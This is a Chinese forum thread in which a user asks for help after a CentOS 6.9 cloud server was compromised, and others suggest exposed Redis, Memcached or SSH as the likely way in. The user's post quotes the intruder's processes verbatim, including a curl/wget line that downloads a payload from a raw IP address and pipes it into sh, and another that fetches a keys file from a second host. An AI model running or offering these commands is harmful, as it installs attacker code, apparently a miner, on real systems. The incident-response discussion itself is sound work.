这是一个创建于 2125 天前的主题,其中的信息可能已经有所发展或是发生改变。
云主机被哪位大佬入侵了,清空了我的 crontab。并未破坏我的其他主要文件。 多了三个进程
1 curl -s https://blockchain.info/balance?cors=true&active= 2 /bin/sh -c (curl -s http://185.164.72.119/log_rotate.bin||wget -q -O- http://185.164.72.119/log_rotate.bin)|sh 3 curl -o /tmp/keys http://178.32.46.58/keys 执行的脚本如下: https://ideone.com/4OR7Xr
我的主机系统版本:
# lsb_release -a LSB Version: unavailable Distributor ID: CentOS Description: CentOS release 6.9 (Final) Release: 6.9 Codename: Final # uname -a Linux vt1 2.6.32-696.20.1.el6.x86_64 #1 SMP Fri Jan 26 17:51:45 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 计算机密码随机大小写字母+数字+特殊符号。 V2 大佬们帮分析,是用了哪个漏洞入侵的?
第 1 条附言 2019-12-18 14:27:01 +08:00
附上所有端口使用情况: https://ideone.com/jKCXUh
我怀疑是openssh版本太低,系统默认的5.3p1
# ssh -V OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013 上午折腾升级到最新版本
# ssh -V OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019  | 1 asd940808 2019-12-17 16:08:31 +08:00  1 改端口,禁 root 和密码登录。用密钥登录,应该就能避免绝大部分的入侵了吧? |
 | 3 lovelynn 2019-12-17 19:25:49 +08:00 1 你有没有开 redis 一般 crontab 修改的都是 redis 未授权访问 |
 | 6 akmonde 2019-12-18 10:54:24 +08:00 1 这就是挖矿的脚本,memcached 看看是不是空口令弱口令~杀掉进程,删除 blockchain 下载的挖矿脚本,改下密码就行~ |
 | 7 nicevar 2019-12-18 11:59:09 +08:00 1 一般就那几点时,ssh 默认 22 端口还允许 root 登陆、redis/MySQL 之类暴露公网了、站点有漏洞让拿到 webshell |
| 8 nicevar 2019-12-18 12:02:30 +08:00 另外这可能都不是人为直接操作入侵的,大佬没必要盯着一台小服务器浪费时间,估计就是自动入侵程序随机扫描搞定了 |
 | 9 tomychen 2019-12-18 14:06:47 +08:00 1 先说说开了哪些服务,这是其一 其二是很多小的 vps 提供商可能被默认值入或者被 hacking 值入模版... |
| 11 tomychen 2019-12-18 14:34:29 +08:00 @zzugyl 我指的是 web redis 等等这种 bind 0.0.0.0 暴露的,或者通过接口能够访问到的 因为直写 crontab 说明已经 root 了 |
 | 12 smallgoogle 2019-12-18 17:23:55 +08:00 1 你可能是 web 漏洞 然后被提权了而已。 |
 | 13 zzugyl OP 我把 openssh 升级到最新版。把 memcached 指定到 127.0.0.1。顺便更新了一下系统。看看明天还会不会被入侵。 |
Select Language